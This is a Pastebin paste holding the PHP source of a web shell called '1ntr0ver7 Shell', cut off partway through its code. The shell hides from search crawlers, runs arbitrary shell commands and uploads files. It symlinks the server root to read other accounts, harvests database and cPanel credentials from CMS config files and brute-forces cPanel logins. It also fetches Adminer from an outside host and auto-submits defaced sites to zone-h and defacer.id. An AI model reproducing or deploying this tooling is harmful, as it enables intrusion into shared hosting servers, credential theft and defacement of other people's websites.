SHARE
TWEET

1T Shell

mrandraz404 Jan 20th, 2017 (edited) 198 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /* (TrojanCoder)(1ntr0ver7) */
  3. $auth = "8dbed99ec7033c378edefd577bb480b3";
  4. session_start();
  5. error_reporting(0);
  6. set_time_limit(0);
  7. @set_magic_quotes_runtime(0);
  8. @clearstatcache();
  9. @ini_set('error_log',NULL);
  10. @ini_set('log_errors',0);
  11. @ini_set('max_execution_time',0);
  12. @ini_set('output_buffering',0);
  13. @ini_set('display_errors', 0);
  14. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  15.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  16.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  17.         header('HTTP/1.0 404 Not Found');
  18.         exit;
  19.     }
  20. }
  21. function loginmas() {
  22. ?>
  23. <html>
  24. <head>
  25. <title>Why ?</title>
  26. <style type="text/css">
  27. html {
  28.   color: red;
  29.   background: url(http://40.media.tumblr.com/3c7a4fdfb251195437c41f3100fb687b/tumblr_mx2sq5sAmC1rpb5h1o1_1280.png);
  30.   font-size: 20px;
  31. }
  32. input[type=password] {
  33.   text-align: center;
  34.   color: red;
  35.   background: transparent;
  36.   border: 1px dotted red;
  37.   padding: 2px;
  38. }
  39. </style>
  40. </head>
  41. </head>
  42. <body color='white' >
  43. <center>
  44. <br><br>
  45. <?php
  46. if($_GET['set'] == 'key') {
  47. ?>
  48. <form method="post">
  49. <input type="password" name="pass">
  50. </form>
  51. <?php
  52. } else {
  53. echo '<h1>Why ?</h1>';
  54. echo '<form method="post">
  55. <input type="password" name="loginpass">
  56. </form>';
  57. }
  58. exit;
  59. }
  60. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  61.     if( empty($auth) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth) ) )
  62.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  63.     else
  64.         loginmas();
  65. if($_GET['set'] == 'key') {
  66. echo '<script>window.location="?";</script>';
  67. }
  68. ?>
  69. <!Dont Let Me Down :v>
  70. <html>
  71. <head>
  72. <link href="" rel="stylesheet" type="text/css">
  73. <title>1ntr0ver7 Shell</title>
  74. <style>
  75. body{
  76. font-family: "Ubuntu", cursive;
  77. background: url(https://1.bp.blogspot.com/-1DTnGVUVLYY/V0RnzYphu9I/AAAAAAAABHM/qPOtNKCYMI4Y0cwU-KHw6MXKpOhk0ZEpACKgB/s1600/Background%2BPower%2BPoint%2B3D%2B9.jpg);
  78. color: white;
  79. }
  80. #content tr:hover{
  81. background-color: red;
  82. text-shadow:0px 0px 10px #fff;
  83. }
  84. #content .first{
  85. background-color: blue;
  86. }
  87. table{
  88. border: 1px solid blue;
  89. }
  90. a{
  91. color: white;
  92. text-decoration: none;
  93. }
  94. a:hover{
  95. color: red;
  96. text-decoration: underline;
  97. }
  98. input,select,textarea{
  99. border: 1px #000000 solid;
  100. -moz-border-radius: 5px;
  101. -webkit-border-radius:5px;
  102. border-radius:5px;
  103. }
  104. </style>
  105. </head>
  106. <?php
  107. function w($dir,$perm) {
  108.     if(!is_writable($dir)) {
  109.         return "<font color=red>".$perm."</font>";
  110.     } else {
  111.         return "<font color=green>".$perm."</font>";
  112.     }
  113. }
  114. function exe($cmd) {
  115.     if(function_exists('system')) {        
  116.         @ob_start();       
  117.         @system($cmd);     
  118.         $buff = @ob_get_contents();        
  119.         @ob_end_clean();       
  120.         return $buff;  
  121.     } elseif(function_exists('exec')) {        
  122.         @exec($cmd,$results);      
  123.         $buff = "";        
  124.         foreach($results as $result) {         
  125.             $buff .= $result;      
  126.         } return $buff;    
  127.     } elseif(function_exists('passthru')) {        
  128.         @ob_start();       
  129.         @passthru($cmd);       
  130.         $buff = @ob_get_contents();        
  131.         @ob_end_clean();       
  132.         return $buff;  
  133.     } elseif(function_exists('shell_exec')) {      
  134.         $buff = @shell_exec($cmd);     
  135.         return $buff;  
  136.     }
  137. }
  138. function sulap($text) {
  139.   if(!get_magic_quotes_gpc()) {
  140.     return $text;
  141.     }
  142.   return stripslashes($text);
  143. }
  144. function ambilKata($param, $kata1, $kata2){
  145.     if(strpos($param, $kata1) === FALSE) return FALSE;
  146.     if(strpos($param, $kata2) === FALSE) return FALSE;
  147.     $start = strpos($param, $kata1) + strlen($kata1);
  148.     $end = strpos($param, $kata2, $start);
  149.     $return = substr($param, $start, $end - $start);
  150.     return $return;
  151. }
  152. function perms($file){
  153. $perms = fileperms($file);
  154. if (($perms & 0xC000) == 0xC000) {
  155. // Socket
  156. $info = 's';
  157. } elseif (($perms & 0xA000) == 0xA000) {
  158. // Symbolic Link
  159. $info = 'l';
  160. } elseif (($perms & 0x8000) == 0x8000) {
  161. // Regular
  162. $info = '-';
  163. } elseif (($perms & 0x6000) == 0x6000) {
  164. // Block special
  165. $info = 'b';
  166. } elseif (($perms & 0x4000) == 0x4000) {
  167. // Directory
  168. $info = 'd';
  169. } elseif (($perms & 0x2000) == 0x2000) {
  170. // Character special
  171. $info = 'c';
  172. } elseif (($perms & 0x1000) == 0x1000) {
  173. // FIFO pipe
  174. $info = 'p';
  175. } else {
  176. // Unknown
  177. $info = 'u';
  178. }
  179.  
  180. // Owner
  181. $info .= (($perms & 0x0100) ? 'r' : '-');
  182. $info .= (($perms & 0x0080) ? 'w' : '-');
  183. $info .= (($perms & 0x0040) ?
  184. (($perms & 0x0800) ? 's' : 'x' ) :
  185. (($perms & 0x0800) ? 'S' : '-'));
  186.  
  187. // Group
  188. $info .= (($perms & 0x0020) ? 'r' : '-');
  189. $info .= (($perms & 0x0010) ? 'w' : '-');
  190. $info .= (($perms & 0x0008) ?
  191. (($perms & 0x0400) ? 's' : 'x' ) :
  192. (($perms & 0x0400) ? 'S' : '-'));
  193.  
  194. // World
  195. $info .= (($perms & 0x0004) ? 'r' : '-');
  196. $info .= (($perms & 0x0002) ? 'w' : '-');
  197. $info .= (($perms & 0x0001) ?
  198. (($perms & 0x0200) ? 't' : 'x' ) :
  199. (($perms & 0x0200) ? 'T' : '-'));
  200.  
  201. return $info;
  202. }
  203. $_1T = 'MW50cjB2ZXI3X1RlcnNha2l0aQ==';
  204. $sys = php_uname();
  205. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  206. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  207. $getds = @ini_get("disable_functions");
  208. $ds = (!empty($getds)) ? "<font>$ds</font>" : "<font>NONE</font>";
  209. if(isset($_GET['path'])){
  210. $path = $_GET['path'];
  211. }else{
  212. $path = getcwd();
  213. }
  214. $path = str_replace('\\','/',$path);
  215. $paths = explode('/',$path);
  216. $home_r = $_SERVER['DOCUMENT_ROOT'];
  217. $_COPY = base64_decode($_1T);
  218. if(get_magic_quotes_gpc()){
  219. foreach($_POST as $key=>$value){
  220. $_POST[$key] = stripslashes($value);
  221. }
  222. }
  223. if($_POST['upload']) {
  224.         if($_POST['tipe_upload'] == 'biasa') {
  225.             if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  226.                 $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  227.             } else {
  228.                 $act = "<font color=red>Failed to upload file</font>";
  229.             }
  230.         } else {
  231.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  232.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  233.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  234.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  235.                     $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  236.                 } else {
  237.                     $act = "<font color=red>Failed to upload file</font>";
  238.                 }
  239.             } else {
  240.                 $act = "<font color=red>Failed to upload file</font>";
  241.             }
  242.         }
  243.     }
  244.     echo "<center>Uploader :
  245.     <form method='post' enctype='multipart/form-data'>
  246.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  247.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  248.     <input type='file' name='ix_file'>
  249.     <input type='submit' value='upload' name='upload'>
  250.     </form>";
  251.     echo $act;
  252. echo '<center>
  253. <table width="700" align="center">
  254. <tr><td>
  255. <center>
  256. <form method="get">
  257. <select name="x">
  258. <option value="">Select</option>
  259. <option value="info">System Info</option>
  260. <option value="mail">Mailer</option>
  261. <option value="network">Network</option>
  262. <option value="jumping">Jumping</option>
  263. <option value="symlink">Symlink</option>
  264. <option value="adminer">Adminer</option>
  265. <option value="config">Config</option>
  266. <option value="krekcepe">CPanel Crack</option>
  267. <option value="edituser">Edit User</option>
  268. <option value="zoneh">Zone - H</option>
  269. <option value="defid">Defacer.id</option>
  270. <option value="kill">Kill Self</option>
  271. </select>
  272. <input type="submit" value=">">
  273. </form>
  274. </center>
  275. </td></tr>
  276. <tr><td>
  277. <center>
  278. <input type="submit" value="Home" onclick="window.location=\'?\'"> ~ <input type="submit" value="Back" onclick="history.back(-1)"> ~ <input type="submit" value="Logout" onclick="window.location=\'?unset=key\'">
  279. </center>
  280. </td></tr></table><br>
  281. <table width="700" align="center">
  282. <tr><td><font color="white">Current Path :</font>';
  283. foreach($paths as $id=>$pat){
  284. if($pat == '' && $id == 0){
  285. $a = true;
  286. echo '<a href="?path=/">/</a>';
  287. continue;
  288. }
  289. if($pat == '') continue;
  290. echo '<a href="?path=';
  291. for($i=0;$i<=$id;$i++){
  292. echo "$paths[$i]";
  293. if($i != $id) echo "/";
  294. }
  295. echo '">'.$pat.'</a>/';
  296. }
  297. echo '</td></tr>';
  298. echo '</table>';
  299. if($_GET['unset'] == 'key') {
  300. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  301. echo "<script>window.location='?';</script>";
  302. }elseif($_GET['x'] == 'info') {
  303. echo '<br><table width="700" align="center">
  304. <tr><td>
  305. <center>
  306. System : '.$sys.'<br>
  307. IP : '.$ip.'<br>
  308. Safe Mode : '.$sm.'<br>
  309. Disabled Functions : '.$ds.'<br>
  310. Home_root : '.$home_r.'
  311. </center>
  312. </td></tr>
  313. </table>';
  314. }elseif($_GET['x'] == 'kill') {
  315. $fileini = $_SERVER['SCRIPT_FILENAME'];
  316. rmdir('1t_sym');rmdir('1t_conf');unlink($fileini);
  317. echo '<script>window.location="https://www.facebook.com/1ntr0ver7.tersakiti";</script>';
  318. }
  319. elseif($_GET['x'] == 'symlink') {
  320. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  321. $d0mains = @file("/etc/named.conf");
  322. ##httaces
  323. if($d0mains){
  324. @mkdir("1t_sym",0777);
  325. @chdir("1t_sym");
  326. @exe("ln -s / ruut");
  327. $file3 = 'Options Indexes FollowSymLinks
  328. DirectoryIndex ruut.htm
  329. AddType text/plain .php
  330. AddHandler text/plain .php
  331. Satisfy Any';
  332. $fp3 = fopen('.htaccess','w');
  333. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  334. echo "
  335. <table align=center border=1 style='width:60%;border-color:#333333;'>
  336. <tr>
  337. <td align=center><font size=2>S. No.</font></td>
  338. <td align=center><font size=2>Domains</font></td>
  339. <td align=center><font size=2>Users</font></td>
  340. <td align=center><font size=2>Symlink</font></td>
  341. </tr>";
  342. $dcount = 1;
  343. foreach($d0mains as $d0main){
  344. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  345. flush();
  346. if(strlen(trim($domains[1][0])) > 2){
  347. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  348. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  349. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  350. <td>".$user['name']."</td>
  351. <td><a href='$full/1t_sym/ruut/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  352. flush();
  353. $dcount++;}}}
  354. echo "</table>";
  355. }else{
  356. $TEST=@file('/etc/passwd');
  357. if ($TEST){
  358. @mkdir("1t_sym",0777);
  359. @chdir("1t_sym");
  360. exe("ln -s / ruut");
  361. $file3 = 'Options Indexes FollowSymLinks
  362. DirectoryIndex ruut.htm
  363. AddType text/plain .php
  364. AddHandler text/plain .php
  365. Satisfy Any';
  366.  $fp3 = fopen('.htaccess','w');
  367.  $fw3 = fwrite($fp3,$file3);
  368.  @fclose($fp3);
  369.  echo "
  370. <table align=center border=1><tr>
  371. <td align=center><font size=3>S. No.</font></td>
  372. <td align=center><font size=3>Users</font></td>
  373. <td align=center><font size=3>Symlink</font></td></tr>";
  374.  $dcount = 1;
  375.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  376.  while(!feof($file)){
  377.  $s = fgets($file);
  378.  $matches = array();
  379.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  380.  $matches = str_replace("home/","",$matches[1]);
  381.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  382.  continue;
  383.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  384. <td align=center><font class=txt>" . $matches . "</td>";
  385.  echo "<td align=center><font class=txt><a href=$full/1t_sym/ruut/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  386.  $dcount++;}fclose($file);
  387.  echo "</table>";}else{if($os != "Windows"){@mkdir("1t_sym",0777);@chdir("1t_sym");@exe("ln -s / ruut");$file3 = '
  388. Options Indexes FollowSymLinks
  389. DirectoryIndex ruut.htm
  390. AddType text/plain .php
  391. AddHandler text/plain .php
  392. Satisfy Any
  393. ';
  394.  $fp3 = fopen('.htaccess','w');
  395.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  396.  echo "
  397. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  398. <table align=center border=1><tr>
  399. <td align=center><font size=3>ID</font></td>
  400. <td align=center><font size=3>Users</font></td>
  401. <td align=center><font size=3>Symlink</font></td></tr>";
  402.  $temp = "";$val1 = 0;$val2 = 1000;
  403.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  404.  if ($uid)$temp .= join(':',$uid)."\n";}
  405.  echo '<br/>';$temp = trim($temp);$file5 =
  406.  fopen("test.txt","w");
  407.  fputs($file5,$temp);
  408.  fclose($file5);$dcount = 1;$file =
  409.  fopen("test.txt", "r") or exit("Unable to open file!");
  410.  while(!feof($file)){$s = fgets($file);$matches = array();
  411.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  412.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  413.  continue;
  414.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  415. <td align=center><font class=txt>" . $matches . "</td>";
  416.  echo "<td align=center><font class=txt><a href=$full/1t_sym/ruut/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  417.  $dcount++;}
  418.  fclose($file);
  419.  echo "</table></div></center>";unlink("test.txt");
  420.  } else
  421.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  422.  }
  423.  }    
  424. }
  425. elseif($_GET['x'] == 'config') {
  426.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  427.     $idx = mkdir("1t_conf", 0777);
  428.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  429.     $htc = fopen("1t_conf/.htaccess","w");
  430.     fwrite($htc, $isi_htc);
  431.     while($passwd = fgets($etc)) {
  432.         if($passwd == "" || !$etc) {
  433.             echo "<font color=red>Can't read /etc/passwd</font>";
  434.         } else {
  435.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  436.             foreach($user_config[1] as $myuser) {
  437.                 $user_config_dir = "/home/$myuser/public_html/";
  438.                 if(is_readable($user_config_dir)) {
  439.                     $grab_config = array(
  440.                         "/home/$myuser/.my.cnf" => "cpanel",
  441.                         "/home/$myuser/.accesshash" => "WHM-accesshash",
  442.                         "/home/$myuser/public_html/po-content/config.php" => "Popoji",
  443.                         "/home/$myuser/public_html/vdo_config.php" => "Voodoo",
  444.                         "/home/$myuser/public_html/bw-configs/config.ini" => "BosWeb",
  445.                         "/home/$myuser/public_html/config/koneksi.php" => "Lokomedia",
  446.                         "/home/$myuser/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  447.                         "/home/$myuser/public_html/clientarea/configuration.php" => "WHMCS",
  448.                         "/home/$myuser/public_html/whm/configuration.php" => "WHMCS",
  449.                         "/home/$myuser/public_html/whmcs/configuration.php" => "WHMCS",
  450.                         "/home/$myuser/public_html/forum/config.php" => "phpBB",
  451.                         "/home/$myuser/public_html/sites/default/settings.php" => "Drupal",
  452.                         "/home/$myuser/public_html/config/settings.inc.php" => "PrestaShop",
  453.                         "/home/$myuser/public_html/app/etc/local.xml" => "Magento",
  454.                         "/home/$myuser/public_html/joomla/configuration.php" => "Joomla",
  455.                         "/home/$myuser/public_html/configuration.php" => "Joomla",
  456.                         "/home/$myuser/public_html/wp/wp-config.php" => "WordPress",
  457.                         "/home/$myuser/public_html/wordpress/wp-config.php" => "WordPress",
  458.                         "/home/$myuser/public_html/wp-config.php" => "WordPress",
  459.                         "/home/$myuser/public_html/admin/config.php" => "OpenCart",
  460.                         "/home/$myuser/public_html/slconfig.php" => "Sitelok",
  461.                         "/home/$myuser/public_html/application/config/database.php" => "Ellislab");
  462.                     foreach($grab_config as $config => $nama_config) {
  463.                         $ambil_config = file_get_contents($config);
  464.                         if($ambil_config == '') {
  465.                         } else {
  466.                             $file_config = fopen("1t_conf/$myuser-$nama_config.txt","w");
  467.                             fputs($file_config,$ambil_config);
  468.                         }
  469.                     }
  470.                 }      
  471.             }
  472.         }  
  473.     }
  474.     echo "<br><center><a href='?path=$path/1t_conf'><font>Done</font></a></center>";
  475. }elseif($_GET['x'] == 'adminer') {
  476.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  477.     function adminer($url, $isi) {
  478.         $fp = fopen($isi, "w");
  479.         $ch = curl_init();
  480.               curl_setopt($ch, CURLOPT_URL, $url);
  481.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  482.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  483.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  484.               curl_setopt($ch, CURLOPT_FILE, $fp);
  485.         return curl_exec($ch);
  486.               curl_close($ch);
  487.         fclose($fp);
  488.         ob_flush();
  489.         flush();
  490.     }
  491.     if(file_exists('adminer.php')) {
  492.         echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  493.     } else {
  494.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  495.             echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  496.         } else {
  497.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  498.         }
  499.     }
  500. }elseif($_GET['x'] == 'krekcepe') {
  501. echo '<center>';
  502.     if($_POST['crack']) {
  503.         $usercp = explode("\r\n", $_POST['user_cp']);
  504.         $passcp = explode("\r\n", $_POST['pass_cp']);
  505.         $i = 0;
  506.         foreach($usercp as $ucp) {
  507.             foreach($passcp as $pcp) {
  508.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  509.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  510.                     } else {
  511.                         $_SESSION[$ucp] = "1";
  512.                         $_SESSION[$pcp] = "1";
  513.                         if($ucp == '' || $pcp == '') {
  514.                            
  515.                         } else {
  516.                             $i++;
  517.                             if(function_exists('posix_getpwuid')) {
  518.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  519.                                 if($domain_cp == '') {
  520.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  521.                                 } else {
  522.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  523.                                     foreach($domains_cp[1] as $dj) {
  524.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  525.                                         $user_cp_url = $user_cp_url['name'];
  526.                                         if($user_cp_url == $ucp) {
  527.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
  528.                                             break;
  529.                                         }
  530.                                     }
  531.                                 }
  532.                             } else {
  533.                                 $dom = "<font color=red>function is Disable by system</font>";
  534.                             }
  535.                             echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
  536.                         }
  537.                     }
  538.                 }
  539.             }
  540.         }
  541.         if($i == 0) {
  542.         } else {
  543.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=green>IndoXploit.</font>";
  544.         }
  545.     } else {
  546.         echo "<center>
  547.         <form method='post'>
  548.         USER: <br>
  549.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  550.         $_usercp = fopen("/etc/passwd","r");
  551.         while($getu = fgets($_usercp)) {
  552.             if($getu == '' || !$_usercp) {
  553.                 echo "<font color=red>Can't read /etc/passwd</font>";
  554.             } else {
  555.                 preg_match_all("/(.*?):x:/", $getu, $u);
  556.                 foreach($u[1] as $user_cp) {
  557.                         if(is_dir("/home/$user_cp/public_html")) {
  558.                             echo "$user_cp\n";
  559.                     }
  560.                 }
  561.             }
  562.         }
  563.         echo "</textarea><br>
  564.         PASS: <br>
  565.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  566.         function cp_pass($dir) {
  567.             $pass = "";
  568.             $dira = scandir($dir);
  569.             foreach($dira as $dirb) {
  570.                 if(!is_file("$dir/$dirb")) continue;
  571.                 $ambil = file_get_contents("$dir/$dirb");
  572.                 if(preg_match("/WordPress/", $ambil)) {
  573.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  574.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  575.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  576.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  577.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  578.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  579.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  580.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  581.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  582.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  583.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  584.                     if(preg_match('/"/', $pass1[1])) {
  585.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  586.                         $pass .= $pass1[1]."\n";
  587.                     } else {
  588.                         $pass .= $pass1[1]."\n";
  589.                     }
  590.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  591.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  592.                 }
  593.             }
  594.             echo $pass;
  595.         }
  596.         $cp_pass = cp_pass($dir);
  597.         echo $cp_pass;
  598.         echo "</textarea><br>
  599.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  600.         </form>
  601.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  602.     }
  603. }
  604. elseif($_GET['x'] == 'zoneh') {
  605.     if($_POST['submit']) {
  606. echo '<center>';
  607.         $domain = explode("\r\n", $_POST['url']);
  608.         $nick =  $_POST['nick'];
  609.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  610.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  611.         function zoneh($url,$nick) {
  612.             $ch = curl_init("http://www.zone-h.com/notify/single");
  613.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  614.                   curl_setopt($ch, CURLOPT_POST, true);
  615.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  616.             return curl_exec($ch);
  617.                   curl_close($ch);
  618.         }
  619.         foreach($domain as $url) {
  620.             $zoneh = zoneh($url,$nick);
  621.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  622.                 echo "$url -> <font>OK</font><br>";
  623.             } else {
  624.                 echo "$url -> <font color=red>ERROR</font><br>";
  625.             }
  626.         }
  627.     } else {
  628.         echo "<center><form method='post'>
  629.         <u>Defacer</u>: <br>
  630.         <input type='text' name='nick' size='50' value='TrojanCoder'><br>
  631.         <u>Domains</u>: <br>
  632.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  633.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  634.         </form>";
  635.     }
  636.     echo "</center>";
  637. }
  638. elseif($_GET['x'] == 'defid') {
  639. echo "<center><form method='post'>
  640.         <u>Defacer</u>: <br>
  641.         <input type='text' name='hekel' size='50' value='TrojanCoder'><br>
  642.         <u>Team</u>: <br>
  643.         <input type='text' name='tim' size='50' value='1ntr0ver7_Tersakiti'><br>
  644.         <u>Domains</u>: <br>
  645.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  646.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  647.         </form>";
  648. $site = explode("\r\n", $_POST['sites']);
  649. $go = $_POST['go'];
  650. $hekel = $_POST['hekel'];
  651. $tim = $_POST['tim'];
  652. if($go) {
  653. foreach($site as $sites) {
  654. $zh = $sites;
  655. $form_url = "https://www.defacer.id/notify";
  656. $data_to_post = array();
  657. $data_to_post['attacker'] = "$hekel";
  658. $data_to_post['team'] = "$tim";
  659. $data_to_post['poc'] = 'SQL Injection';
  660. $data_to_post['url'] = "$zh";
  661. $curl = curl_init();
  662. curl_setopt($curl,CURLOPT_URL, $form_url);
  663. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  664. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  665. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  666. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  667. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  668. $result = curl_exec($curl);
  669. echo $result;
  670. curl_close($curl);
  671. echo "<br>";
  672. }
  673. }
  674. }elseif($_GET['x'] == 'jumping') {
  675.     $i = 0;
  676.     echo "<div class='margin: 5px auto;'>";
  677.     if(preg_match("/hsphere/", $dir)) {
  678.         $urls = explode("\r\n", $_POST['url']);
  679.         if(isset($_POST['jump'])) {
  680.             echo "<pre>";
  681.             foreach($urls as $url) {
  682.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  683.                 $etc = "/etc/passwd";
  684.                 $f = fopen($etc,"r");
  685.                 while($gets = fgets($f)) {
  686.                     $pecah = explode(":", $gets);
  687.                     $user = $pecah[0];
  688.                     $dir_user = "/hsphere/local/home/$user";
  689.                     if(is_dir($dir_user) === true) {
  690.                         $url_user = $dir_user."/".$url;
  691.                         if(is_readable($url_user)) {
  692.                             $i++;
  693.                             $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  694.                             if(is_writable($url_user)) {
  695.                                 $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  696.                             }
  697.                             echo $jrw."<br>";
  698.                         }
  699.                     }
  700.                 }
  701.             }
  702.         if($i == 0) {
  703.         } else {
  704.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  705.         }
  706.         echo "</pre>";
  707.         } else {
  708.             echo '<center>
  709.                   <form method="post">
  710.                   List Domains: <br>
  711.                   <textarea name="url" style="width: 500px; height: 250px;">';
  712.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  713.             while($getss = fgets($fp)) {
  714.                 echo $getss;
  715.             }
  716.             echo  '</textarea><br>
  717.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  718.                   </form></center>';
  719.         }
  720.     } elseif(preg_match("/vhosts/", $dir)) {
  721.         $urls = explode("\r\n", $_POST['url']);
  722.         if(isset($_POST['jump'])) {
  723.             echo "<pre>";
  724.             foreach($urls as $url) {
  725.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  726.                 if(is_dir($web_vh) === true) {
  727.                     if(is_readable($web_vh)) {
  728.                         $i++;
